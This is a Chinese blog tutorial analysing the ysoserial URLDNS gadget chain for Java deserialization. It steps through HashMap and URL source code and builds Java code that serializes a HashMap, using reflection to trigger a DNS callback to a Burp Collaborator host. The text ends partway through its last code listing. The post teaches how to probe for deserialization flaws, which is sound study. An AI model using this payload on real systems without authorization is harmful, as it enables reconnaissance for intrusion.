<!DOCTYPE html><html lang="zh"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content="2024-08-20"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><link rel="canonical" href="https://osthing.github.io/blog/java-sec%E4%BB%8E0-5%E5%88%B01-urldns%E9%93%BE"><link rel="alternate" type="application/rss+xml" title="oSthing's blog" href="/rss.xml"><meta name="generator" content="Astro v5.18.2"><title>JAVA_SEC从0.5到1_UrlDns链 — oSthing&#39;s blog</title><meta property="og:type" content="website"><meta property="og:title" content="JAVA_SEC从0.5到1_UrlDns链 — oSthing's blog"><meta property="og:description" content="2024-08-20"><meta property="og:url" content="https://osthing.github.io/blog/java-sec%E4%BB%8E0-5%E5%88%B01-urldns%E9%93%BE"><meta property="og:image" content="https://osthing.github.io/og-default.png"><meta property="og:site_name" content="oSthing's blog"><meta property="og:locale" content="zh-CN"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="JAVA_SEC从0.5到1_UrlDns链 — oSthing's blog"><meta name="twitter:description" content="2024-08-20"><meta name="twitter:image" content="https://osthing.github.io/og-default.png"><link rel="preconnect" href="https://rsms.me/"><link rel="stylesheet" href="https://rsms.me/inter/inter.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/JetBrains/JetBrainsMono@v2.304/web/css/jetbrains-mono.css"><link rel="stylesheet" href="/_astro/_slug_.AMwGTgR1.css"></head> <body class="min-h-screen flex flex-col bg-bg-light dark:bg-bg-dark text-fg-light dark:text-fg-dark antialiased"> <script>
  (function () {
    try {
      const stored = localStorage.getItem('theme');
      const prefersDark = window.matchMedia('(prefers-color-scheme: dark)').matches;
      const theme = stored ?? (prefersDark ? 'dark' : 'light');
      if (theme === 'dark') {
        document.documentElement.classList.add('dark');
      }
    } catch (_) {
      /* no-op */
    }
  })();
</script> <header class="border-b border-border-light dark:border-border-dark sticky top-0 z-30 bg-bg-light/80 dark:bg-bg-dark/80 backdrop-blur"> <div class="mx-auto flex w-full max-w-6xl items-center justify-between px-6 py-4"> <a href="/" class="flex items-center gap-2 font-mono text-sm font-medium tracking-tight"> <span class="inline-flex h-2 w-2 rounded-full bg-accent-light dark:bg-accent-dark"></span> <span>osthing&#39;s blog</span> </a> <nav class="hidden md:flex items-center gap-1 text-sm"> <a href="/" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> home </a><a href="/blog" class="rounded-md px-3 py-1.5 transition-colors text-fg-light dark:text-fg-dark"> blog </a><a href="/projects" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> projects </a><a href="/links" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> links </a><a href="/about" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> about </a><a href="/contact" class="rounded-md px-3 py-1.5 transition-colors text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark"> contact </a> </nav> <div class="flex items-center gap-2 text-sm text-muted-light dark:text-muted-dark"> <a href="https://github.com/oSthing" rel="noopener noreferrer" target="_blank" class="rounded-md px-2 py-1 hover:text-fg-light dark:hover:text-fg-dark"> GitHub </a><a href="/rss.xml" rel="noopener noreferrer" class="rounded-md px-2 py-1 hover:text-fg-light dark:hover:text-fg-dark"> RSS </a> <button id="theme-toggle" type="button" aria-label="Toggle theme" class="rounded-md p-2 text-muted-light dark:text-muted-dark hover:text-fg-light dark:hover:text-fg-dark transition-colors"> <svg class="hidden dark:block h-4 w-4" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="4"></circle> <path d="M12 2v2"></path> <path d="M12 20v2"></path> <path d="m4.93 4.93 1.41 1.41"></path> <path d="m17.66 17.66 1.41 1.41"></path> <path d="M2 12h2"></path> <path d="M20 12h2"></path> <path d="m6.34 17.66-1.41 1.41"></path> <path d="m19.07 4.93-1.41 1.41"></path> </svg> <svg class="block dark:hidden h-4 w-4" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <path d="M12 3a6 6 0 0 0 9 9 9 9 0 1 1-9-9Z"></path> </svg> </button> <script type="module">const e=document.getElementById("theme-toggle");e?.addEventListener("click",()=>{const t=document.documentElement.classList.toggle("dark");try{localStorage.setItem("theme",t?"dark":"light")}catch{}});</script> </div> </div>  </header> <main class="flex-1 w-full">  <article class="mx-auto w-full max-w-5xl px-6 py-16"> <header class="mb-12 border-b border-border-light dark:border-border-dark pb-8"> <div class="mb-3 flex items-center gap-2 text-sm text-muted-light dark:text-muted-dark"> <time datetime="2024-08-20T00:00:00.000Z">2024年8月20日</time> <span aria-hidden="true">·</span> <span>2 min read</span> </div> <h1 class="text-4xl font-semibold tracking-tight md:text-5xl">JAVA_SEC从0.5到1_UrlDns链</h1> <p class="mt-4 text-lg text-muted-light dark:text-muted-dark">2024-08-20</p> <div class="mt-4 flex flex-wrap gap-2"> <span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> ctf </span><span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> web </span><span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> java_sec </span><span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> 代码审计 </span><span class="rounded-full border border-border-light dark:border-border-dark px-2.5 py-0.5 text-xs"> 反序列化 </span> </div> </header> <div class="grid gap-12 md:grid-cols-[minmax(0,1fr)_240px]"> <div class="prose prose-neutral dark:prose-invert max-w-none">  <p>我入门的第一条链子，我们可以直接从<a href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java">ysoserial</a>里面链子进行分析</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#768390">/*</span></span>
<span class="line"><span style="color:#768390"> *   Gadget Chain:</span></span>
<span class="line"><span style="color:#768390"> *     HashMap.readObject()</span></span>
<span class="line"><span style="color:#768390"> *       HashMap.putVal()</span></span>
<span class="line"><span style="color:#768390"> *         HashMap.hash()</span></span>
<span class="line"><span style="color:#768390"> *           URL.hashCode()</span></span>
<span class="line"><span style="color:#768390"> */</span></span></code></pre>
<p>我们构建好环境开始分析，我这里用的是java 8u65版本，任意版本都可以</p>
<h2 id="urlhashcode">URL.hashCode()</h2>
<p>那么我们直接从最底下的<code>hashCode</code>开始看</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> synchronized</span><span style="color:#F47067"> int</span><span style="color:#DCBDFB"> hashCode</span><span style="color:#ADBAC7">() {</span></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (hashCode </span><span style="color:#F47067">!=</span><span style="color:#F47067"> -</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#F47067">            return</span><span style="color:#ADBAC7"> hashCode;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        hashCode </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> handler.</span><span style="color:#DCBDFB">hashCode</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">this</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#ADBAC7"> hashCode;</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>这里面调用了一个<code>handler</code>的<code>hashCode()</code>我们跟进去看一下</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">protected</span><span style="color:#F47067"> int</span><span style="color:#DCBDFB"> hashCode</span><span style="color:#ADBAC7">(URL u) {</span></span>
<span class="line"><span style="color:#F47067">    int</span><span style="color:#ADBAC7"> h</span><span style="color:#F47067"> =</span><span style="color:#6CB6FF"> 0</span><span style="color:#ADBAC7">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">    // Generate the protocol part.</span></span>
<span class="line"><span style="color:#ADBAC7">    String</span><span style="color:#ADBAC7"> protocol</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> u.</span><span style="color:#DCBDFB">getProtocol</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> (protocol </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#ADBAC7">        h </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> protocol.</span><span style="color:#DCBDFB">hashCode</span><span style="color:#ADBAC7">();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">    // Generate the host part.</span></span>
<span class="line"><span style="color:#ADBAC7">    InetAddress</span><span style="color:#ADBAC7"> addr</span><span style="color:#F47067"> =</span><span style="color:#DCBDFB"> getHostAddress</span><span style="color:#ADBAC7">(u);</span></span>
<span class="line"><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> (addr </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">) {</span></span>
<span class="line"><span style="color:#ADBAC7">        h </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> addr.</span><span style="color:#DCBDFB">hashCode</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">    } </span><span style="color:#F47067">else</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#ADBAC7">        String</span><span style="color:#ADBAC7"> host</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> u.</span><span style="color:#DCBDFB">getHost</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (host </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#ADBAC7">            h </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> host.</span><span style="color:#DCBDFB">toLowerCase</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">hashCode</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">    // Generate the file part.</span></span>
<span class="line"><span style="color:#ADBAC7">    String</span><span style="color:#ADBAC7"> file</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> u.</span><span style="color:#DCBDFB">getFile</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> (file </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#ADBAC7">        h </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> file.</span><span style="color:#DCBDFB">hashCode</span><span style="color:#ADBAC7">();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">    // Generate the port part.</span></span>
<span class="line"><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> (u.</span><span style="color:#DCBDFB">getPort</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">==</span><span style="color:#F47067"> -</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#ADBAC7">        h </span><span style="color:#F47067">+=</span><span style="color:#DCBDFB"> getDefaultPort</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">    else</span></span>
<span class="line"><span style="color:#ADBAC7">        h </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> u.</span><span style="color:#DCBDFB">getPort</span><span style="color:#ADBAC7">();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">    // Generate the ref part.</span></span>
<span class="line"><span style="color:#ADBAC7">    String</span><span style="color:#ADBAC7"> ref</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> u.</span><span style="color:#DCBDFB">getRef</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> (ref </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#ADBAC7">        h </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> ref.</span><span style="color:#DCBDFB">hashCode</span><span style="color:#ADBAC7">();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">    return</span><span style="color:#ADBAC7"> h;</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span>
<span class="line"></span></code></pre>
<p>那么我们最终要掉用的函数就是<code>getHostAddress</code>了，看简介就是进行一次访问的，这条链的目的就是用于测试一个攻击点是否可以用反序列化攻击</p>
<blockquote>
<p>Get the IP address of our host. An empty host field or a DNS failure will result in a null return.</p>
</blockquote>
<p>我们简单测试一下</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">package</span><span style="color:#ADBAC7"> org.example;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.net.MalformedURLException;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.net.URL;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> Main</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> MalformedURLException {</span></span>
<span class="line"><span style="color:#ADBAC7">        URL</span><span style="color:#ADBAC7"> url</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> URL</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"http://rni5ssk3vjwz6l7kzf113aezpqvhj97y.oastify.com"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        url.</span><span style="color:#DCBDFB">hashCode</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>我们能再bp里面收到一条记录，说明成功访问到了</p>
<p><img src="E:/notes/web/%E4%BB%8E0.5%E5%BC%80%E5%A7%8B%E7%9A%84java%E5%AE%89%E5%85%A8/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/img/urldns1.png" alt=""></p>
<p>我们的目的是要反序列化的，也就是说我们要找一层一层调用能调用到带有重写<code>readObject</code>方法的类</p>
<p>知道这条链是干什么的我们就可以开始回到<code>hashCode</code>开始跟了，我们需要找可以利用的类也调用了<code>hashCode</code>这个同名函数，这么说可能有点懵，我们看上面<code>ysoserial</code>里的链子是<code>HashMap.hash()</code>，我们也可以按两下shift找到同名调用函数</p>
<h2 id="hashmaphash">HashMap.hash()</h2>
<p>找到<code>HashMap.hashCode()</code>后我们看一下</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    static</span><span style="color:#F47067"> final</span><span style="color:#F47067"> int</span><span style="color:#DCBDFB"> hash</span><span style="color:#ADBAC7">(Object key) {</span></span>
<span class="line"><span style="color:#F47067">        int</span><span style="color:#ADBAC7"> h;</span></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#ADBAC7"> (key </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">?</span><span style="color:#6CB6FF"> 0</span><span style="color:#F47067"> :</span><span style="color:#ADBAC7"> (h </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> key.</span><span style="color:#DCBDFB">hashCode</span><span style="color:#ADBAC7">()) </span><span style="color:#F47067">^</span><span style="color:#ADBAC7"> (h </span><span style="color:#F47067">>>></span><span style="color:#6CB6FF"> 16</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>这里面调用了<code>hashCode</code>，那么我们的目标是让<code>key=URL</code>才行，我们试一下直接调用，发现是调用不了的我们要通过类名进行调用，那么直接调用是不行了，不过我们可以看一下HashMap里肯定有调用这个方法的地方,同样是find us找到</p>
<p>那么就进到ysoseri里的<code>HashMap.putVal()</code></p>
<h2 id="hashmapputval">HashMap.putVal()</h2>
<p>我们看一下源码put调用了putVal同时调用了hash</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    public</span><span style="color:#ADBAC7"> V </span><span style="color:#DCBDFB">put</span><span style="color:#ADBAC7">(K key, V value) {</span></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#DCBDFB"> putVal</span><span style="color:#ADBAC7">(</span><span style="color:#DCBDFB">hash</span><span style="color:#ADBAC7">(key), key, value, </span><span style="color:#6CB6FF">false</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">true</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>还是public那么我们就可以调试一下看一下了</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">package</span><span style="color:#ADBAC7"> org.example;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.net.MalformedURLException;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.net.URL;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.util.HashMap;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> Main</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> MalformedURLException {</span></span>
<span class="line"><span style="color:#ADBAC7">        URL</span><span style="color:#ADBAC7"> url</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> URL</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"http://g1iu6hys98aokal9d4fqhzso3f96xzlo.oastify.com"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        HashMap</span><span style="color:#ADBAC7"> hashMap</span><span style="color:#F47067">=new</span><span style="color:#ADBAC7"> HashMap&#x3C;>();</span></span>
<span class="line"><span style="color:#ADBAC7">        hashMap.</span><span style="color:#DCBDFB">put</span><span style="color:#ADBAC7">(url,</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>成功解析到dns</p>
<p>那么我们能成功调用到之后我们就要开始找<code>readObject</code>了，我们能看见正好hashmap就有一个<code>readObject</code></p>
<h2 id="hashmapreadobject">HashMap.readObject()</h2>
<p>里面具体写的什么不用管，知道有<code>readObject</code>了直接开始序列化就好了</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">package</span><span style="color:#ADBAC7"> org.example;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.io.</span><span style="color:#6CB6FF">*</span><span style="color:#ADBAC7">;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.net.MalformedURLException;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.net.URL;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.util.HashMap;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> Main</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException {</span></span>
<span class="line"><span style="color:#768390">//        URL url=new URL("http://g1iu6hys98aokal9d4fqhzso3f96xzlo.oastify.com");</span></span>
<span class="line"><span style="color:#768390">//        HashMap hashMap=new HashMap&#x3C;>();</span></span>
<span class="line"><span style="color:#768390">//        hashMap.put(url,1);</span></span>
<span class="line"><span style="color:#768390">//        serialize(hashMap);</span></span>
<span class="line"><span style="color:#DCBDFB">        unserialize</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"ser.bin"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> serialize</span><span style="color:#ADBAC7">(Object </span><span style="color:#F69D50">obj</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException {</span></span>
<span class="line"><span style="color:#ADBAC7">        ObjectOutputStream</span><span style="color:#ADBAC7"> oos</span><span style="color:#F47067"> =</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> ObjectOutputStream</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">new</span><span style="color:#DCBDFB"> FileOutputStream</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"ser.bin"</span><span style="color:#ADBAC7">));</span></span>
<span class="line"><span style="color:#ADBAC7">        oos.</span><span style="color:#DCBDFB">writeObject</span><span style="color:#ADBAC7">(obj);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#ADBAC7"> Object </span><span style="color:#DCBDFB">unserialize</span><span style="color:#ADBAC7">(String </span><span style="color:#F69D50">Filename</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException{</span></span>
<span class="line"><span style="color:#ADBAC7">        ObjectInputStream</span><span style="color:#ADBAC7"> ois</span><span style="color:#F47067"> =</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> ObjectInputStream</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">new</span><span style="color:#DCBDFB"> FileInputStream</span><span style="color:#ADBAC7">(Filename));</span></span>
<span class="line"><span style="color:#ADBAC7">        Object</span><span style="color:#ADBAC7"> obj</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> ois.</span><span style="color:#DCBDFB">readObject</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#ADBAC7"> obj;</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>我们发现并没有收到请求，我们再<code>URL.hashCode</code>打个断点进去调试一下看看，我们发现hashCode的值不是-1，所以直接走到return里面了，没有执行hashcode，所以我们要想办法吧hashCode的值改成-1，那么在运行中修改值就是需要反射进行在运行中修改了</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">package</span><span style="color:#ADBAC7"> org.example;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.io.</span><span style="color:#6CB6FF">*</span><span style="color:#ADBAC7">;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.lang.reflect.Field;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.net.MalformedURLException;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.net.URL;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.util.HashMap;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> Main</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {</span></span>
<span class="line"><span style="color:#ADBAC7">        URL</span><span style="color:#ADBAC7"> url</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> URL</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"http://w1ya6xy89oa4kqlpdkf6hfs43v9mxhl6.oastify.com"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        Field</span><span style="color:#ADBAC7"> f</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Class.</span><span style="color:#DCBDFB">forName</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"java.net.URL"</span><span style="color:#ADBAC7">).</span><span style="color:#DCBDFB">getDeclaredField</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"hashCode"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        HashMap</span><span style="color:#ADBAC7"> hashMap</span><span style="color:#F47067">=new</span><span style="color:#ADBAC7"> HashMap&#x3C;>();</span></span>
<span class="line"><span style="color:#ADBAC7">        hashMap.</span><span style="color:#DCBDFB">put</span><span style="color:#ADBAC7">(url,</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        f.</span><span style="color:#DCBDFB">setAccessible</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">true</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        f.</span><span style="color:#DCBDFB">set</span><span style="color:#ADBAC7">(url,</span><span style="color:#F47067">-</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#DCBDFB">        serialize</span><span style="color:#ADBAC7">(hashMap);</span></span>
<span class="line"><span style="color:#768390">//        unserialize("ser.bin");</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> serialize</span><span style="color:#ADBAC7">(Object </span><span style="color:#F69D50">obj</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException {</span></span>
<span class="line"><span style="color:#ADBAC7">        ObjectOutputStream</span><span style="color:#ADBAC7"> oos</span><span style="color:#F47067"> =</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> ObjectOutputStream</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">new</span><span style="color:#DCBDFB"> FileOutputStream</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"ser.bin"</span><span style="color:#ADBAC7">));</span></span>
<span class="line"><span style="color:#ADBAC7">        oos.</span><span style="color:#DCBDFB">writeObject</span><span style="color:#ADBAC7">(obj);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#ADBAC7"> Object </span><span style="color:#DCBDFB">unserialize</span><span style="color:#ADBAC7">(String </span><span style="color:#F69D50">Filename</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException{</span></span>
<span class="line"><span style="color:#ADBAC7">        ObjectInputStream</span><span style="color:#ADBAC7"> ois</span><span style="color:#F47067"> =</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> ObjectInputStream</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">new</span><span style="color:#DCBDFB"> FileInputStream</span><span style="color:#ADBAC7">(Filename));</span></span>
